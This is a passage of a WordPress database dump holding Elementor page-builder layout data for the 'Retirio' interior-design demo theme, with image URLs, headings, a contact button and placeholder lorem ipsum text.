\\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(3002,4738,'_elementor_page_assets','a:1:{s:6:\"styles\";a:16:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";i:15;s:12:\"e-animations\";}}'),(3003,4738,'_elementor_pro_version','3.8.1'),(3004,4739,'_wp_page_template','elementor_header_footer'),(3005,4739,'_elementor_edit_mode','builder'),(3006,4739,'_elementor_template_type','wp-page'),(3007,4739,'_elementor_version','3.8.1'),(3008,4739,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM 